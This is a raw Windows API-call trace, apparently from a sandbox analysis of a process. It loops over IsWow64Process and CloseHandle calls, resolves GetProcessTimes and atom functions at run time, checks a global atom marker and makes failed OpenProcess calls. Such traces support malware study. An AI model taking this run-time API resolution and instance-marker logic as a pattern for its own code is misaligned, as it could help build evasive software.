	[0137.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.161] CloseHandle (hObject=0x2dc) returned 1
	[0137.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.161] CloseHandle (hObject=0x2dc) returned 1
	[0137.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.161] CloseHandle (hObject=0x2dc) returned 1
	[0137.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.161] CloseHandle (hObject=0x2dc) returned 1
	[0137.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.162] CloseHandle (hObject=0x2dc) returned 1
	[0137.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.162] CloseHandle (hObject=0x2dc) returned 1
	[0137.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.162] CloseHandle (hObject=0x2dc) returned 1
	[0137.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.162] CloseHandle (hObject=0x2dc) returned 1
	[0137.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.163] CloseHandle (hObject=0x2dc) returned 1
	[0137.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.163] CloseHandle (hObject=0x2dc) returned 1
	[0137.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.163] CloseHandle (hObject=0x2dc) returned 1
	[0137.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.163] CloseHandle (hObject=0x2dc) returned 1
	[0137.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.164] CloseHandle (hObject=0x2dc) returned 1
	[0137.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.164] CloseHandle (hObject=0x2dc) returned 1
	[0137.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.164] CloseHandle (hObject=0x2dc) returned 1
	[0137.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.164] CloseHandle (hObject=0x2dc) returned 1
	[0137.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.164] CloseHandle (hObject=0x2dc) returned 1
	[0137.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.165] CloseHandle (hObject=0x2dc) returned 1
	[0137.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.165] CloseHandle (hObject=0x2dc) returned 1
	[0137.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.165] CloseHandle (hObject=0x2dc) returned 1
	[0137.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.165] CloseHandle (hObject=0x2dc) returned 1
	[0137.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.166] CloseHandle (hObject=0x2dc) returned 1
	[0137.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.166] CloseHandle (hObject=0x2dc) returned 1
	[0137.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.166] CloseHandle (hObject=0x2dc) returned 1
	[0137.166] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.166] CloseHandle (hObject=0x2dc) returned 1
	[0137.167] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.167] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.167] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.167] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.167] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.168] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.168] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.168] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.168] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.168] CloseHandle (hObject=0x2dc) returned 1
	[0137.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.168] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.168] CloseHandle (hObject=0x2dc) returned 1
	[0137.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.169] CloseHandle (hObject=0x2dc) returned 1
	[0137.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.169] CloseHandle (hObject=0x2dc) returned 1
	[0137.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.169] CloseHandle (hObject=0x2dc) returned 1
	[0137.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.169] CloseHandle (hObject=0x2dc) returned 1
	[0137.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.203] CloseHandle (hObject=0x2dc) returned 1
	[0137.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.203] CloseHandle (hObject=0x2dc) returned 1
	[0137.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.203] CloseHandle (hObject=0x2dc) returned 1
	[0137.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.204] CloseHandle (hObject=0x2dc) returned 1
	[0137.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.204] CloseHandle (hObject=0x2dc) returned 1
	[0137.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.204] CloseHandle (hObject=0x2dc) returned 1
	[0137.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.204] CloseHandle (hObject=0x2dc) returned 1
	[0137.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.205] CloseHandle (hObject=0x2dc) returned 1
	[0137.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.205] CloseHandle (hObject=0x2dc) returned 1
	[0137.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.205] CloseHandle (hObject=0x2dc) returned 1
	[0137.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.205] CloseHandle (hObject=0x2dc) returned 1
	[0137.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.206] CloseHandle (hObject=0x2dc) returned 1
	[0137.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.206] CloseHandle (hObject=0x2dc) returned 1
	[0137.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.206] CloseHandle (hObject=0x2dc) returned 1
	[0137.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.206] CloseHandle (hObject=0x2dc) returned 1
	[0137.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.207] CloseHandle (hObject=0x2dc) returned 1
	[0137.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.207] CloseHandle (hObject=0x2dc) returned 1
	[0137.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.207] CloseHandle (hObject=0x2dc) returned 1
	[0137.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.207] CloseHandle (hObject=0x2dc) returned 1
	[0137.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.207] CloseHandle (hObject=0x2dc) returned 1
	[0137.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.208] CloseHandle (hObject=0x2dc) returned 1
	[0137.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.208] CloseHandle (hObject=0x2dc) returned 1
	[0137.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.208] CloseHandle (hObject=0x2dc) returned 1
	[0137.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.208] CloseHandle (hObject=0x2dc) returned 1
	[0137.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.209] CloseHandle (hObject=0x2dc) returned 1
	[0137.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.209] CloseHandle (hObject=0x2dc) returned 1
	[0137.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.209] CloseHandle (hObject=0x2dc) returned 1
	[0137.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.209] CloseHandle (hObject=0x2dc) returned 1
	[0137.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.210] CloseHandle (hObject=0x2dc) returned 1
	[0137.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.210] CloseHandle (hObject=0x2dc) returned 1
	[0137.210] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.210] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.210] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.211] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.211] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.211] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.211] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.211] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.211] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.212] CloseHandle (hObject=0x2dc) returned 1
	[0137.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.212] CloseHandle (hObject=0x2dc) returned 1
	[0137.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.212] CloseHandle (hObject=0x2dc) returned 1
	[0137.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.212] CloseHandle (hObject=0x2dc) returned 1
	[0137.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.213] CloseHandle (hObject=0x2dc) returned 1
	[0137.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.213] CloseHandle (hObject=0x2dc) returned 1
	[0137.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.245] CloseHandle (hObject=0x2dc) returned 1
	[0137.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.246] CloseHandle (hObject=0x2dc) returned 1
	[0137.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.246] CloseHandle (hObject=0x2dc) returned 1
	[0137.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.246] CloseHandle (hObject=0x2dc) returned 1
	[0137.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.246] CloseHandle (hObject=0x2dc) returned 1
	[0137.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.247] CloseHandle (hObject=0x2dc) returned 1
	[0137.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.247] CloseHandle (hObject=0x2dc) returned 1
	[0137.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.247] CloseHandle (hObject=0x2dc) returned 1
	[0137.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.247] CloseHandle (hObject=0x2dc) returned 1
	[0137.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.248] CloseHandle (hObject=0x2dc) returned 1
	[0137.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.248] CloseHandle (hObject=0x2dc) returned 1
	[0137.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.248] CloseHandle (hObject=0x2dc) returned 1
	[0137.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.248] CloseHandle (hObject=0x2dc) returned 1
	[0137.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.249] CloseHandle (hObject=0x2dc) returned 1
	[0137.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.249] CloseHandle (hObject=0x2dc) returned 1
	[0137.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.249] CloseHandle (hObject=0x2dc) returned 1
	[0137.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.249] CloseHandle (hObject=0x2dc) returned 1
	[0137.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.249] CloseHandle (hObject=0x2dc) returned 1
	[0137.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.250] CloseHandle (hObject=0x2dc) returned 1
	[0137.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.250] CloseHandle (hObject=0x2dc) returned 1
	[0137.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.250] CloseHandle (hObject=0x2dc) returned 1
	[0137.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.250] CloseHandle (hObject=0x2dc) returned 1
	[0137.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.251] CloseHandle (hObject=0x2dc) returned 1
	[0137.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.251] CloseHandle (hObject=0x2dc) returned 1
	[0137.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.251] CloseHandle (hObject=0x2dc) returned 1
	[0137.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.251] CloseHandle (hObject=0x2dc) returned 1
	[0137.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.252] CloseHandle (hObject=0x2dc) returned 1
	[0137.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.252] CloseHandle (hObject=0x2dc) returned 1
	[0137.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.252] CloseHandle (hObject=0x2dc) returned 1
	[0137.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.252] CloseHandle (hObject=0x2dc) returned 1
	[0137.253] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.253] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.253] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.253] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.253] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.253] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.254] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.254] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.254] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.254] CloseHandle (hObject=0x2dc) returned 1
	[0137.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.254] CloseHandle (hObject=0x2dc) returned 1
	[0137.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.254] CloseHandle (hObject=0x2dc) returned 1
	[0137.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.255] CloseHandle (hObject=0x2dc) returned 1
	[0137.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.255] CloseHandle (hObject=0x2dc) returned 1
	[0137.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.255] CloseHandle (hObject=0x2dc) returned 1
	[0137.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.290] CloseHandle (hObject=0x2dc) returned 1
	[0137.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.290] CloseHandle (hObject=0x2dc) returned 1
	[0137.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.290] CloseHandle (hObject=0x2dc) returned 1
	[0137.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.290] CloseHandle (hObject=0x2dc) returned 1
	[0137.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.291] CloseHandle (hObject=0x2dc) returned 1
	[0137.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.291] CloseHandle (hObject=0x2dc) returned 1
	[0137.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.291] CloseHandle (hObject=0x2dc) returned 1
	[0137.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.291] CloseHandle (hObject=0x2dc) returned 1
	[0137.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.292] CloseHandle (hObject=0x2dc) returned 1
	[0137.292] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.292] CloseHandle (hObject=0x2dc) returned 1
	[0137.292] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.292] CloseHandle (hObject=0x2dc) returned 1
	[0137.292] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.292] CloseHandle (hObject=0x2dc) returned 1
	[0137.292] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.293] CloseHandle (hObject=0x2dc) returned 1
	[0137.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.293] CloseHandle (hObject=0x2dc) returned 1
	[0137.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.293] CloseHandle (hObject=0x2dc) returned 1
	[0137.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.293] CloseHandle (hObject=0x2dc) returned 1
	[0137.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.294] CloseHandle (hObject=0x2dc) returned 1
	[0137.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.294] CloseHandle (hObject=0x2dc) returned 1
	[0137.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.294] CloseHandle (hObject=0x2dc) returned 1
	[0137.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.294] CloseHandle (hObject=0x2dc) returned 1
	[0137.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.294] CloseHandle (hObject=0x2dc) returned 1
	[0137.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.295] CloseHandle (hObject=0x2dc) returned 1
	[0137.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.295] CloseHandle (hObject=0x2dc) returned 1
	[0137.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.295] CloseHandle (hObject=0x2dc) returned 1
	[0137.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.295] CloseHandle (hObject=0x2dc) returned 1
	[0137.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.296] CloseHandle (hObject=0x2dc) returned 1
	[0137.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.296] CloseHandle (hObject=0x2dc) returned 1
	[0137.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.296] CloseHandle (hObject=0x2dc) returned 1
	[0137.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.296] CloseHandle (hObject=0x2dc) returned 1
	[0137.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.297] CloseHandle (hObject=0x2dc) returned 1
	[0137.297] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.297] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.297] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.298] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.298] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.298] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.298] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.298] CloseHandle (hObject=0x2dc) returned 1
	[0137.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.299] CloseHandle (hObject=0x2dc) returned 1
	[0137.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.299] CloseHandle (hObject=0x2dc) returned 1
	[0137.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.299] CloseHandle (hObject=0x2dc) returned 1
	[0137.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.299] CloseHandle (hObject=0x2dc) returned 1
	[0137.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.300] CloseHandle (hObject=0x2dc) returned 1
